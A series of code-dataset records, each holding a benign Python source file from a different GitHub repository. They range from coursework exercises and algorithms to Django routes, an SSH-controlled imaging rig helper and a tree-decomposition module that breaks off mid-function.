self.ui.folderpathEdit.setText(path)\n self.check_install_dir()\n\n def load_json(self) -> None:\n self.logger.log('Downloading JSON')\n url = self.app.locale['json_url']\n start_time = time.time()\n try:\n resp = requests.get(url)\n if not resp.status_code == 200:\n raise RuntimeError('Failed to download code 200 != ' + str(resp.status_code))\n except Exception as err:\n self.logger.error('Failed to download JSON', err)\n return self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][36],\n lambda: self.tab_changed(0)\n )\n self.json_data = resp.json()\n end_time = time.time()\n self.logger.log(f'JSON downloaded [{self.app.round_point(end_time - start_time, 3)}s]')\n\n def set_stylesheet(self, style_name: str) -> None:\n self.logger.log('Setting stylesheet', style_name)\n self.window.setStyleSheet(self.app.read_text(os.path.join(self.app.files_dir, style_name + '.qss')))\n","repo_name":"gdlocalisation/gdl-installer","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"2172434407","text":"#! /bin/python\nimport config\nimport argparse\nfrom bac.core import Engine\nimport logging\n\n\ndef main():\n argparser = argparse.ArgumentParser()\n try:\n eng = Engine(config)\n eng.init_crawler(argparser)\n args = argparser.parse_args()\n eng.parse_arguments(args)\n except Exception as e:\n logging.error(str(e))\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"wwtg99/bio_api_crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20174799493","text":"import matplotlib.pyplot as plt\nimport csv\n\ntemp=[]\nAve_magnetization=[]\n\n# # h=[]\n# # i=[]\n# # j=[]\n# # a=0.01\n# # for k in range(1,100):\n# # j.append(a*2)\n# # a+=1\n# # plt.plot(j)\n# # plt.savefig('foo.png')\nwith open('Magnetization.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n next(csvfile)\n for row in readCSV:\n print(row[0])\n temp.append(row[0])\n Ave_magnetization.append(row[1])\n next(csvfile)\n\nplt.plot(temp,Ave_magnetization,'-gD')\n# plt.scatter(Ave_magnetization,temp, alpha=0.5)\n# plt.savefig('Temp__Vs__Ave_magnetization.png')\n# # s=area, c=colors,\n# print(temp)\n# print(Ave_magnetization)\n\n# import matplotlib.pyplot as plt\n# import pylab\n\n# x = [1,2,3,4]\n# y = [3,4,8,6]\n\n# plt.scatter(x,y)\n# plt.show()\n# plt.savefig('testing.png')","repo_name":"manand881/Ising_Model_Python","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23575432790","text":"def reformat(string):\n string = string.replace('-', '').replace('(', '').replace(')', '')\n\n return string[-10:] if len(string) > 7 else '495' + string[-7:]\n\n\nn = 4\nphones = [input() for _ in range(n)]\nfor phone in phones[1:]:\n print('YES' if reformat(phones[0]) == reformat(phone) else 'NO')\n","repo_name":"Gambrinius/Python_Course","sub_path":"week7/phone_numbers.py","file_name":"phone_numbers.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13364120305","text":"'''\nDescribe a recursive algorithm to compute the integer part of the base-two\nlogarithm of n using only addition and integer division.\n'''\ndef log(num,acc=0):\n if num == 1:\n return acc\n else:\n return log(num//2,acc+1)\n \n \n \nprint(log(10))","repo_name":"FuratMAlsmadi/AlgoNinga","sub_path":"Chapter_4/Creativity/C_4.10.py","file_name":"C_4.10.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33133796341","text":"\nwith open(\"input.txt\") as f:\n content = [int(x) for x in f.readlines()]\n\ncontent.append(max(content) + 3)\ncontent.sort()\n\n\nmemo = {0: 1}\n\nfor v in content:\n if v not in memo:\n memo[v] = 0\n for n in [1, 2, 3]:\n if v - n in memo:\n memo[v] += memo[v - n]\n\nprint(memo[max(content)])\nprint(memo)\n","repo_name":"Kehvarl/AdventOfCode_2020","sub_path":"Completed/10.2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12915401325","text":"from django.urls import path\nfrom .views import f_page, private_event_page, public_event_page, public_events, private_events, places, place_page, \\\n user_login, logout, user_register, public_events_old, private_events_old, create_private_event, \\\n create_public_event, create_place, unverified_places, unverified_public_events, remove_post,\\\n deleted_places, deleted_public_events, deleted_private_events, comment_remove\n\nurlpatterns = [\n path('', f_page),\n path('Event//', public_event_page, name='priv'),\n path('Event/', public_events),\n path('Event-old/', public_events_old, name='event-old'),\n path('PrivateEvent//', private_event_page),\n path('PrivateEvent/', private_events),\n path('PrivateEvent-old/', private_events_old),\n path('Place/', place_page),\n path('Place/', places),\n path('auth/login/', user_login),\n path(\"auth/logout/\", logout),\n path(\"auth/register/\", user_register),\n path(\"create-private-event/\", create_private_event),\n path(\"create-public-event/\", create_public_event),\n path(\"create-place/\", create_place),\n path(\"unverified-places///\", unverified_places),\n path(\"unverified-places/\", unverified_places),\n path(\"unverified-public-events///\", unverified_public_events),\n path(\"unverified-public-events/\", unverified_public_events),\n path(\"remove-post///\", remove_post),\n path(\"deleted-places///\", deleted_places),\n path(\"deleted-places/\", deleted_places),\n path(\"deleted-public-events///\", deleted_public_events),\n path(\"deleted-public-events/\", deleted_public_events),\n path(\"deleted-private-events///\", deleted_private_events),\n path(\"deleted-private-events/\", deleted_private_events),\n path(\"comment-remove//\", comment_remove),\n]\n","repo_name":"kda2019/InKiev_djangoProject","sub_path":"inkiev/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74586933905","text":"def pair_with_targetsum(arr, target_sum):\n left, right = 0, len(arr) - 1\n\n while left < right:\n curr_sum = arr[left] + arr[right]\n if curr_sum == target_sum:\n return [left, right]\n elif curr_sum > target_sum:\n right -= 1\n else:\n left += 1\n\n# Time Complexity: O(n) b/c we make one pass\n# Space Complexity: O(1) b/c we just initialize curr_sum, left, right","repo_name":"garzeah/algorithms","sub_path":"general/two_pointers/pair_with_target_sum.py","file_name":"pair_with_target_sum.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73824733267","text":"import os, time\nimport glob\n\nfrom numpy import save, load\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom skimage import io\nfrom skimage import color\nfrom skimage import img_as_bool\nfrom skimage.transform import resize\n\nfrom skimage.metrics import structural_similarity as ssim\nfrom skimage.metrics import mean_squared_error\n\nimport scipy.misc\n\nfrom PIL import Image\n\nimport paramiko\n\nimport math\n\nimport colorednoise as cn\n\n# https://stackoverflow.com/questions/2489435/check-if-a-number-is-a-perfect-square\ndef is_square(integer):\n\troot = math.sqrt(integer)\n\treturn integer == int(root + 0.5) ** 2\n\ndef connect_ssh(password):\n\thost = \"192.168.7.2\"\n\tport = 22\n\tusername = \"debian\"\n\t# deprecated, password is passed from GUI input\n\t#password = input(\"Input password for debian@BBB: \")\n\t\n\tssh = paramiko.SSHClient()\n\t\t\t\t\t\t\n\tssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\t\n\ttry:\n\t\tssh.connect(host, port, username, password)\t\t\t\t\t\n\t\n\texcept:\n\t\tprint(\"Connecting to BBB failed!\")\n\t\tssh = None\n\t\n\treturn ssh\n\t\ndef execute_remote_command(ssh, command):\n\tstdin, stdout, stderr = ssh.exec_command(command)\n\t#stdin, stdout, stderr = ssh.exec_command(command, get_pty=True)\n\t\n\treturn [stdin, stdout, stderr]\n\t\ndef close_ssh(ssh):\n\tssh.close()\n\n# TODO debug\n# sometimes returns WinError 5 (Permission error) when trying to clear the dir\ndef clear_directory(directory):\n\tfiles_in_folder = glob.glob(directory + '/*')\n\tfor f in files_in_folder:\n\t\tos.remove(f)\n\t\t\ndef save_list_of_lists(list_of_lists, directory, export_mode, resolution):\n\tprint(\"PNG/BMP export mode: \" + str(export_mode))\n\n\t# TODO - change to something more logical\n\t\n\tN = resolution\n\t\n\t# save as .npy for efficient binary IO\n\tif export_mode is False:\n\t\ti = 0\n\t\tfor lst in list_of_lists:\n\t\t\tj = 0\n\t\t\tfor el in lst:\n\t\t\t\tsave(directory + 'name_' + str(i) + '_' + str(j) + '.npy', el, allow_pickle=False)\n\t\t\t\tj += 1\n\t\t\ti += 1\n\t\t\n\t\tprint(\"Done saving patterns!\")\n\t\t\n\t# save as .png in 1920x1080 for DMD display \n\telif export_mode is True:\n\t\ti = 0\n\t\tfor lst in list_of_lists:\n\t\t\tj = 0\n\t\t\tfor el in lst:\n\t\t\t\t# doesn't work well for small arrays\n\t\t\t\t#el_resized_square = np.resize(el, (360,360))\n\t\t\t\t\n\t\t\t\t# temporary workaround -> padding the small array\n\t\t\t\tarr_shape = np.shape(el)\n\t\t\t\tpad_dim_y = int((360 - arr_shape[0]) / 2)\n\t\t\t\tpad_dim_x = int((360 - arr_shape[1]) / 2)\n\t\t\t\tel_resized_square = np.pad(el, ((pad_dim_y, pad_dim_x), \n\t\t\t\t\t\t\t\t\t\t\t\t(pad_dim_y, pad_dim_x)), \n\t\t\t\t\t\t\t\t\t\t\t\t'constant', \n\t\t\t\t\t\t\t\t\t\t\t\tconstant_values=0)\n\t\t\t\t\n\t\t\t\tel_resized_padded = np.pad(el_resized_square, \n\t\t\t\t\t\t\t\t\t\t ((0,0), (140,140)), \n\t\t\t\t\t\t\t\t\t\t 'constant', \n\t\t\t\t\t\t\t\t\t\t constant_values=0)\n\t\t\t\t\t\t\t\t\t\t \n\t\t\t\timg = Image.fromarray((np.real(el_resized_padded) * 255 ))\n\t\t\t\t# change bit depth to 24-bit True Color - the only format accepted by DLP2000 default display software\n\t\t\t\timg_24 = img.convert(\"RGB\")\n\t\t\t\timg_24.save(directory + str(i) + '_' + str(j) + '.bmp')\n\t\t\t\tj += 1\n\t\t\ti += 1\n\t\t\n\t\tprint(\"Done saving patterns!\")\n\n\telse:\n\t\tprint(\"Export mode error!\")\n\n# https://stackoverflow.com/questions/6494102/how-to-save-and-load-an-array-of-complex-numbers-using-numpy-savetxt\ndef save_measurements(meas, file):\n\t# convert meas list to numpy array\n\tmeas_arr = np.array(meas)\n\t# save the array as real (reinterpreted)\n\tnp.savetxt(file + '.txt', meas_arr.view(float))\n\ndef save_measurement_vector(meas, file):\n\t# convert meas list to numpy array\n\tmeas_arr = np.array(meas)\n\t# save the array as real (reinterpreted)\n\tnp.savetxt(file + '.txt', meas_arr.view(int))\n\ndef load_measurements(file):\n\t# load the array as complex \n\ttry:\n\t\tmeas_load = np.loadtxt(file + '.txt').view(complex)\n\t\t\n\texcept:\n\t\tprint(\"Error opening file!\")\n\t\tmeas_load = []\n\t\t\n\treturn meas_load\n\t\ndef load_measurements_real(file):\n\t# load the array as complex \n\ttry:\n\t\tmeas_load = np.loadtxt(file + '.txt').view(float)\n\t\t\n\texcept:\n\t\tprint(\"Error opening file!\")\n\t\tmeas_load = []\n\t\t\n\treturn meas_load\n\t\n# TODO mode\ndef load_list_of_lists(directory, mode):\n\tdir_list = os.listdir(directory)\n\t\n\tlist_of_lists = []\n\ttemp_list = []\n\t\n\ti = 0\n\tfor el in dir_list:\n\t\ttemp_list.append(load(directory + el))\n\t\t\n\t\ti+=1\n\t\t\n\t\tif i == 3:\n\t\t\tlist_of_lists.append(temp_list)\n\t\t\ttemp_list = []\n\t\t\ti = 0\n\t\t\t\n\tprint(\"Done loading patterns!\")\n\n\treturn list_of_lists\n\ndef save_image(image, img_name, directory):\n\t#save(str(directory) + str(img_name) + '_.bmp', image, allow_pickle=False)\n\timg = Image.fromarray(image)\n\timg_24 = img.convert(\"RGB\")\n\timg_24.save(str(directory) + str(img_name) + '.bmp')\n\ndef save_image_complex(image, img_name, directory):\n\trescaled = (255.0 / image.max() * (image - image.min())).astype(np.uint8)\n\t#rescaled = image\n\t#rescaled *= 255.0 / rescaled.max()\n\t#rescaled = rescaled.astype(np.uint8)\n\timg = Image.fromarray(rescaled)\n\timg.save(str(directory) + str(img_name) + '.png')\n\ndef load_image(filename):\n\timage = io.imread(filename)\n\t\n\timage_gray = color.rgb2gray(image)\n\n\treturn image_gray\n\t\ndef resize_image(image, resolution):\n\tN = resolution\n\timage_resized = resize(image, (N, N))\n\t\n\treturn image_resized\n\n# displays multiple images in one window\n# doesn't work for reconstructions of real world measurements, due to a type error!\ndef show_images(images, cols = 2, titles = None):\n\t\"\"\"Display a list of images in a single figure with matplotlib.\n\t\n\tParameters\n\t---------\n\timages: List of np.arrays compatible with plt.imshow.\n\t\n\tcols (Default = 1): Number of columns in figure (number of rows is \n\t\t\t\t\t\tset to np.ceil(n_images/float(cols))).\n\t\n\ttitles: List of titles corresponding to each image. Must have\n\t\t\tthe same length as titles.\n\t\"\"\"\n\tplt.rcParams.update({'font.size': 16})\n\t\n\tassert((titles is None)or (len(images) == len(titles)))\n\tn_images = len(images)\n\tif titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n\tfig = plt.figure()\n\tfor n, (image, title) in enumerate(zip(images, titles)):\n\t\ta = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n\t\t#if image.ndim == 2:\n\t\tplt.summer()\n\t\tplt.imshow(image)\n\t\ta.set_title(title)\n\tfig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n\t\n\t#plt.savefig('./GALLERY/reconstruction.eps', format='eps')\n\tplt.savefig('./GALLERY/reconstruction.png')\n\t#plt.show()\n\t\ndef plot_list(data_list):\n\t#x = list(range(1, len(data_list)+1))\n\tplt.xlabel(\"Pattern number\")\n\tplt.ylabel(\"Measured intensity\")\n\tplt.plot(data_list)\n\t\n\t#plt.savefig('./GALLERY/vector.eps', format='eps')\n\tplt.savefig('./GALLERY/vector.png')\n\tplt.show()\n\t\ndef calculate_PSNR(ground_truth, reconstructed_image):\n\tMSE = mean_squared_error(ground_truth, np.real(reconstructed_image))\n\tPSNR = 10*math.log10(ground_truth.max()**2 / MSE)\n\n\treturn (MSE, PSNR)\n\t\ndef calculate_SSIM(ground_truth, reconstructed_image):\n\tSSIM = ssim(ground_truth, np.real(reconstructed_image))\n\n\treturn SSIM\n\n# TODO: change to 2D\n# https://www.socsci.ru.nl/wilberth/python/noise.html\ndef spectrum_noise(spectrum_func, samples=1024, rate=44100):\n \"\"\" \n make noise with a certain spectral density\n \"\"\"\n freqs = np.fft.rfftfreq(samples, 1.0/rate) # real-fft frequencies (not the negative ones)\n spectrum = np.zeros_like(freqs, dtype='complex') # make complex numbers for spectrum\n spectrum[1:] = spectrum_func(freqs[1:]) # get spectrum amplitude for all frequencies except f=0\n phases = np.random.uniform(0, 2*np.pi, len(freqs)-1) # random phases for all frequencies except f=0\n spectrum[1:] *= np.exp(1j*phases) # apply random phases\n noise = np.fft.irfft(spectrum) # return the reverse fourier transform\n noise = np.pad(noise, (0, samples - len(noise)), 'constant') # add zero for odd number of input samples\n \n return noise\n\n# https://www.socsci.ru.nl/wilberth/python/noise.html\ndef pink_spectrum(f, f_min=0, f_max=np.inf, att=np.log10(2.0)*10):\n \"\"\"\n Define a pink (1/f) spectrum\n f = array of frequencies\n f_min = minimum frequency for band pass\n f_max = maximum frequency for band pass\n att = attenuation per factor two in frequency in decibel.\n Default is such that a factor two in frequency increase gives a factor two in power attenuation.\n \"\"\"\n # numbers in the equation below explained:\n # 0.5: take the square root of the power spectrum so that we get an amplitude (field) spectrum \n # 10.0: convert attenuation from decibel to bel\n # 2.0: frequency factor for which the attenuation is given (octave)\n s = f**-( 0.5 * (att/10.0) / np.log10(2.0) ) # apply attenuation\n s[np.logical_or(f < f_min, f > f_max)] = 0 # apply band pass\n return s\n\n# TODO\ndef add_noise(image, noise_type, magnitude):\n\tnoisy_image = image\n\tN = image.shape[0]\n\n\t# https://numpy.org/doc/stable/reference/random/generated/numpy.random.rand.html\n\tif noise_type == \"white\":\n\t\tnoisy_image += magnitude * np.random.rand(image.shape[0], image.shape[1])\n\t\t\n\t# https://www.socsci.ru.nl/wilberth/python/noise.html\n\telif noise_type == \"pink\":\n\t\tpass\n\n\telif noise_type == \"pink_2\":\n\t\t# check if it can take a tuple/N-dimensional\n\t\tcn.powerlaw_psd_gaussian(1, (N, N))\n\t\t\n\telif noise_type == \"blue\":\n\t\t# a possible implementation: https://github.com/MomentsInGraphics/BlueNoise/blob/master/BlueNoise.py\n\t\tpass\n\t\t\n\telif noise_type == \"brown\":\n\t\t# check if it can take a tuple/N-dimensional\n\t\tcn.powerlaw_psd_gaussian(2, (N, N))\n\n\telse:\n\t\tprint(\"Incorrect noise type selected!\")\n\n\treturn noisy_image","repo_name":"f-labaj/SPI-S-portable","sub_path":"auxiliary_functions.py","file_name":"auxiliary_functions.py","file_ext":"py","file_size_in_byte":9423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31208057617","text":"\"\"\"\r\nAlex Chaban\r\nDue 03-31-2023\r\nProf. Ionut Cardei\r\nCOP4045\r\nProblem 2: Functional Programming\r\n\"\"\"\r\n\r\nfrom itertools import islice, filterfalse\r\nimport functools\r\n\r\n\"\"\"\r\nBoilerplate Generator taken from Problem 1\r\nDescription: Generates a random sequence of numbers based on the LCG formula.\r\nConditions: A seed x0, and a number of generations n.\r\nMust use a yield generator.\r\n\"\"\"\r\ndef rnd_gen(x0, n):\r\n it = 0\r\n m = 2**32\r\n a = 22695477\r\n c = 1\r\n while it != n:\r\n x0 = ((a*x0 + c) % m)\r\n yield x0\r\n it += 1\r\n\r\n\"\"\"\r\nPart A: Infinite tuple generator\r\nDescription: Generates a random sequence of tuples (a, b)\r\nwhere a and b are integers generated from rnd_gen(1, -1)\r\nConditions: 0 <_ a <_ b < m. m must be a number.\r\nMust use a yield generator.\r\n\"\"\"\r\ndef gen_rndtup(m):\r\n temp_gen = iter(rnd_gen(1, -1))\r\n\r\n while True:\r\n a, b = (next(temp_gen) % m), (next(temp_gen) % m)\r\n\r\n if b >= a:\r\n yield((a,b))\r\n\r\n\"\"\"\r\nMAIN FUNCTION\r\n\"\"\"\r\ndef main():\r\n print('Part A (remains unprinted as it is infinite):')\r\n #print([i for i in gen_rndtup(10)])\r\n\r\n print('Part B:')\r\n first_eight = islice(gen_rndtup(10), 8)\r\n print(list(filterfalse(lambda x : x[0] + x[1] >= 6, first_eight)))\r\n\r\n print('Part C:')\r\n piece_one = iter(rnd_gen(1, -1))\r\n piece_two = iter(rnd_gen(2, -1))\r\n l_a = []\r\n l_b = [] #two generators, two maps to zip\r\n for i in range(0,8):\r\n a, b = (next(piece_one) % 100), (next(piece_two) % 100)\r\n l_a.append(a)\r\n l_b.append(b)\r\n l = zip(l_a, l_b)\r\n print(list(filterfalse(lambda x : x[0] > x[1], l))) #filters out any case of a > b\r\n\r\n print('Part D:')\r\n d_gen = islice(rnd_gen(1, -1), 10)\r\n l = list(i for i in d_gen)\r\n l = map(lambda x : x % 100, l)\r\n l = filter(lambda x : x % 13 == 0, l)\r\n print(list(l))\r\n\r\n print('Part E:') #fix\r\n e_gen = islice(gen_rndtup(10), 10)\r\n l = filter(lambda x : x[0] + x[1] >= 5, e_gen)\r\n l = map(lambda x : x[0] + x[1], l)\r\n l = functools.reduce(lambda a, b : a + b, l)\r\n print(l)\r\n\r\nmain()\r\n","repo_name":"alexsocial/PythonCourse","sub_path":"FuncSlicing.py","file_name":"FuncSlicing.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10789394876","text":"import requests\nimport csv\nfrom dagster import job, op, get_dagster_logger\n\n\n@op\ndef download_cereals():\n response = requests.get(\"https://docs.dagster.io/assets/cereal.csv\")\n lines = response.text.split(\"\\n\")\n return [row for row in csv.DictReader(lines)]\n\n\n@op\ndef find_sugariest(cereals):\n sorted_by_sugar = sorted(cereals, key=lambda cereal: cereal[\"sugars\"])\n get_dagster_logger().info(f'{sorted_by_sugar[-1][\"name\"]} is the sugariest cereal')\n\n\n@job\ndef serial():\n find_sugariest(download_cereals())\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/dagster/serial_job.py","file_name":"serial_job.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"31488842507","text":"\"\"\"\n\nTP#16-rescate de naufragos - TRABAJO 5\n\n\"\"\"\n\n#> creo el maximo del tablero: \n\nEje_x_maximo = int(input(\"Ingrese el maximo del eje x del tablero del juego: \"))\nEje_y_maximo = int(input(\"Ingrese el maximo del eje y del tablero del juego: \"))\nExtencion_maxima_del_tablero = (Eje_x_maximo,Eje_y_maximo)\n\nprint(\"Extencion maxima del tablero: \", Eje_x_maximo, \"x\", Eje_y_maximo)\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n#> creo las posiciones de la cantidad de naufragos que quiero:\n \nMaximo_de_naufragos = int(input(\"Ingrese maximo de naufragos: \"))\n\nimport random\n\n#para determinar si me exedo con la cantidad de naufragos que puedo colocar en el tabler, volver a pedir valores correctos\n\nwhile Maximo_de_naufragos > (Eje_x_maximo * Eje_y_maximo):\n print(\"\\nNo es posible ingresar esa cantidad de naufragos en el tablero. Ingrese un tablero mas grande o coloque menos naufragos. \\n\")\n \n Eje_x_maximo = int(input(\"Ingrese el maximo del eje x del tablero del juego: \"))\n Eje_y_maximo = int(input(\"Ingrese el maximo del eje y del tablero del juego: \"))\n Extencion_maxima_del_tablero = (Eje_x_maximo,Eje_y_maximo)\n\n print(\"Extencion maxima del tablero: \", Eje_x_maximo, \"x\", Eje_y_maximo)\n\n Maximo_de_naufragos = int(input(\"Ingrese nuevamente el maximo de naufragos: \"))\n\n\n#random.sample(population, k)\n\n#Creo la lista donde coloco los pares de los naufragos, otra para poner solo las x y otro para poner solo las y\n\nlista_de_posiciones_de_naufragos = []\n\nlista_de_posiciones_de_naufragos_en_x = []\n\nlista_de_posiciones_de_naufragos_en_y = []\n\nfor naufrago in range(0, Maximo_de_naufragos):\n \n Posicion_del_naufrago_en_eje_X = random.randint(1, Eje_x_maximo)\n Posicion_del_naufrago_en_eje_Y = random.randint(1, Eje_y_maximo)\n Posicion_del_naufrago = (Posicion_del_naufrago_en_eje_X, Posicion_del_naufrago_en_eje_Y)\n #Posicion_del_naufrago = list(Posicion_del_naufrago)\n \n \n while Posicion_del_naufrago in lista_de_posiciones_de_naufragos:\n Posicion_del_naufrago_en_eje_X = random.randint(1, Eje_x_maximo)\n Posicion_del_naufrago_en_eje_Y = random.randint(1, Eje_y_maximo)\n Posicion_del_naufrago = (Posicion_del_naufrago_en_eje_X, Posicion_del_naufrago_en_eje_Y)\n \n \n else:\n \n lista_de_posiciones_de_naufragos.append(Posicion_del_naufrago)\n \n lista_de_posiciones_de_naufragos_en_x.append(Posicion_del_naufrago_en_eje_X)\n \n lista_de_posiciones_de_naufragos_en_y.append(Posicion_del_naufrago_en_eje_Y)\n\n\"\"\" \nprint(lista_de_posiciones_de_naufragos)\nprint(lista_de_posiciones_de_naufragos_en_x)\nprint(lista_de_posiciones_de_naufragos_en_y)\n\"\"\"\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n#> pedir la cantidad de sondas que uno quiere usar y dsp si encuentra un naufrago\n\nMaximo_de_sondas = int(input(\"Ingrese maximo de sondas: \"))\n\nContador_de_naufragos = Maximo_de_naufragos\nContador_de_sondas = Maximo_de_sondas\n\n\nfor sonda in range(0, Maximo_de_sondas): #repite la cantidad de sondas que tengas\n \n if Contador_de_naufragos == 0:\n break\n \n Posicion_de_la_sonda_en_eje_X = int(input(f\"Ingrese la posicion en el eje x de la sonda numero {sonda + 1}: \"))\n Posicion_de_la_sonda_en_eje_Y = int(input(f\"Ingrese la posicion en el eje y de la sonda numero {sonda + 1}: \"))\n Posicion_de_la_sonda = (Posicion_de_la_sonda_en_eje_X, Posicion_de_la_sonda_en_eje_Y)\n \n \n \n if Posicion_de_la_sonda in lista_de_posiciones_de_naufragos: #si la posicion de la sonda agregada esta en la lista de naufragos\n print(f\"Encontraste a un naufrago en la posicion {Posicion_de_la_sonda}\")\n lista_de_posiciones_de_naufragos.remove(Posicion_de_la_sonda) #elimina al naufrago que se genero en la lista para que no se repita\n \n lista_de_posiciones_de_naufragos_en_x.remove(Posicion_de_la_sonda_en_eje_X)\n\n lista_de_posiciones_de_naufragos_en_y.remove(Posicion_de_la_sonda_en_eje_Y)\n \n Contador_de_naufragos = Contador_de_naufragos - 1 #disminuye la cantidad de naufragos a busacar\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n \n #print(lista_de_posiciones_de_naufragos)\n #print(lista_de_posiciones_de_naufragos_en_x)\n #print(lista_de_posiciones_de_naufragos_en_y)\n \n elif Posicion_de_la_sonda_en_eje_X in lista_de_posiciones_de_naufragos_en_x:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n print(\"Hay un naufrago en el mismo eje x\")\n \n elif Posicion_de_la_sonda_en_eje_Y in lista_de_posiciones_de_naufragos_en_y:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n print(\"Hay un naufrago en el mismo eje y\")\n\n \n \n else:\n Contador_de_sondas = Contador_de_sondas - 1 #disminuyen las sondas disponibles\n print(\"No encontraste a ningun naufrago, ni tampoco se encuentra un naufrago en ninguno de los dos ejes\")\n\n print(f\"Sondas disponibles: {Contador_de_sondas}\")\n print(f\"Naufragos por encontrar: {Contador_de_naufragos}\")\n \n \n\nif Contador_de_naufragos == 0:\n print(\"\\n¡Encontraste a todos los naufragos!\")\nelse:\n print(f\"Te faltaron por encontrar {Contador_de_naufragos} naufragos\")\n\n#print(lista_de_posiciones_de_naufragos)\n \n#else:\n #print(\"No encontraste un naufrago\")\n \n","repo_name":"GatitoEnojado/Tareas-Programacion","sub_path":"Juego del Naufrago DEFINITIVO.py","file_name":"Juego del Naufrago DEFINITIVO.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4823222270","text":"# uym2 added\n# June 2017\n# utils for tree decomposition\n\n\nfrom dendropy import Tree\ntry:\n from queue import Queue # python 3\nexcept ImportError:\n from Queue import Queue # python 2\n# from tree import PhylogeneticTree\nfrom sepp import get_logger\n\n_LOG = get_logger(__name__)\n\n\ndef decompose_by_diameter(a_tree, strategy, max_size=None, min_size=None,\n max_diam=None):\n def __ini_record__():\n for node in a_tree.postorder_node_iter():\n __update_node__(node)\n\n def __find_midpoint_edge__(tre):\n u = tre.seed_node.bestLCA.anchor\n uel = u.edge_length if u.edge_length else 0\n d = 0\n while d + uel < tre.seed_node.diameter / 2:\n d += uel\n u = u.parent_node\n uel = u.edge_length if u.edge_length else 0\n return u.edge\n\n def __find_centroid_edge__(tre):\n u = tre.seed_node\n product = 0\n acc_nleaf = 0\n\n while not u.is_leaf():\n max_child = None\n max_child_nleaf = 0\n for ch in u.child_node_iter():\n if ch.nleaf > max_child_nleaf:\n max_child_nleaf = ch.nleaf\n max_child = ch\n acc_nleaf += (u.nleaf-max_child.nleaf)\n new_product = max_child.nleaf * acc_nleaf\n if new_product <= product:\n break\n product = new_product\n u = max_child\n\n return u.edge\n\n def __bisect__(tre, edg):\n # e = __find_centroid_edge__(t)\n\n u = edg.tail_node\n v = edg.head_node\n\n u.remove_child(v)\n tr1 = Tree(seed_node=v)\n\n if u.num_child_nodes() == 1:\n p = u.parent_node\n v = u.child_nodes()[0]\n l_v = v.edge_length if v.edge_length else 0\n u.remove_child(v)\n # u is the seed_node; this means the tree runs out of all but one\n # side\n if p is None:\n tre.seed_node = v\n return tre, tr1\n l_u = u.edge_length if u.edge_length else 0\n p.remove_child(u)\n p.add_child(v)\n v.edge_length = l_u + l_v\n u = p\n\n while u is not None:\n __update_node__(u)\n u = u.parent_node\n\n return tre, tr1\n\n def __clean_up__(tre):\n for node in tre.postorder_node_iter():\n delattr(node, \"nleaf\")\n delattr(node, \"anchor\")\n # delattr(node,\"maxheight\")\n delattr(node, \"maxdepth\")\n delattr(node, \"diameter\")\n # delattr(node,\"topo_diam\")\n delattr(node, \"bestLCA\")\n\n def __update_node__(node):\n if node.is_leaf():\n node.anchor = node\n # node.maxheight = 0\n node.maxdepth = 0\n node.diameter = 0\n # node.topo_diam = 0\n node.bestLCA = node\n node.nleaf = 1\n return\n\n # n1 = -1\n # n2 = -1\n d1 = -1\n d2 = -1\n anchor1 = None\n node.diameter = 0\n # node.topo_diam = 0\n node.bestLCA = None\n node.nleaf = 0\n\n for ch in node.child_node_iter():\n node.nleaf += ch.nleaf\n# n = ch.maxheight + 1\n d = ch.maxdepth + ch.edge_length if ch.edge_length else 0\n# if n > n1:\n# n2 = n1\n# n1 = n\n# anchor2 = anchor1\n# anchor1 = ch.anchor\n# elif n > n2:\n# n2 = n\n# anchor2 = ch.anchor\n if d > d1:\n d2 = d1\n d1 = d\n anchor1 = ch.anchor\n elif d > d2:\n d2 = 